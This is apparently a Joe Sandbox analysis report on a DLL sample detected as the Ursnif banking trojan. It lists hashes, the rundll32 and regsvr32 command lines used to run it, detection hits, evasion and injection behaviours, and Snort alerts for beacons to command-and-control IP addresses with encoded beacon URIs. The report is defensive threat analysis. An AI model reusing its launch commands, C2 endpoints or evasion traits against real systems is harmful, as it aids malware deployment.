Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report qT9Qk5aKTk.dll

Overview

General Information

Sample Name:qT9Qk5aKTk.dll
Analysis ID:481107
MD5:58d9e2906f42336e9bee1137b4cf5839
SHA1:7f29e42f6d317d7b11ad164a672e91e4515b5bc0
SHA256:a9a0db068a2ed9c7b9b3cdbe7f3c1c82a6f9d2c1c7d4b820820927da004b6cbf
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Found stalling execution ending in API Sleep call
Writes or reads registry keys via WMI
PE file has nameless sections
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Registers a DLL
PE file contains more sections than normal
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1132 cmdline: loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3560 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 572 cmdline: rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3528 cmdline: regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5080 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 4536 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6576 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3276 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82974 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4132 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17458 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5644 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17462 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 2200 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4620 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6272 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6420 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6532 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6832 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7040 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6284 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 768 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1268 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6568 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5852 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4504 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6324 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6812 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4580 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5520 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4928 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2188 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Exequatur MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4976 cmdline: rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Meith MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000002.646505839.00000000006A0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 64 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.rundll32.exe.3380000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              27.2.rundll32.exe.d50000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                31.2.rundll32.exe.400000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  26.2.rundll32.exe.4420000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.2.regsvr32.exe.5e0000.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 21 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: qT9Qk5aKTk.dllVirustotal: Detection: 80%Perma Link
                      Source: qT9Qk5aKTk.dllMetadefender: Detection: 59%Perma Link
                      Source: qT9Qk5aKTk.dllReversingLabs: Detection: 82%
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: qT9Qk5aKTk.dllAvira: detected
                      Source: 0.2.loaddll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 2.2.regsvr32.exe.5e0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 3.2.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: 31.2.rundll32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8
                      Source: qT9Qk5aKTk.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49768 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49816 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49817 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49821 version: TLS 1.2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00EC12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00EC12D4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00C812D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_00C812D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04B312D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,10_2_04B312D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_054712D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,12_2_054712D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04F412D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,17_2_04F412D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_052D12D4 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,29_2_052D12D4

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49824 -> 13.225.29.191:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49887 -> 13.225.29.191:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49887 -> 13.225.29.191:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49935 -> 13.225.29.204:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49935 -> 13.225.29.204:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49938 -> 13.225.29.191:80
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownDNS traffic detected: queries for: www.msn.com
                      Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: geolocation.onetrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: btloader.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fimages.maennersache.de%2Fkunde-will-150-packungen-klopapier-umtauschen-john-paul-drake%2Cid%3D73f41081%2Cb%3Dmaennersache%2Cw%3D1600%2Crm%3Dsk.jpeg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5c635ff03c0adc713f159b2abe690081.png HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc3cfcb8c707b14064f9cad58b478df43.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F6375ef5dcb44b841a2c82f366826a986.jpeg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/de-ch/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: img.img-taboola.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49768 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49782 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49816 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49817 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49820 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.364222279.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468105899.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468188061.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364616223.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.649016082.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375358568.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375444270.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468218845.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.651754848.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375275190.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364320937.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364389953.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375222083.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468255149.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375580970.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.333121153.0000000006AF8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.648129313.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468276277.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375181159.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364453388.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468293136.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.468154438.0000000003008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375508831.00000000010A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.364561415.0000000005318000.00000004.00000040.sdmp, type: MEMORY
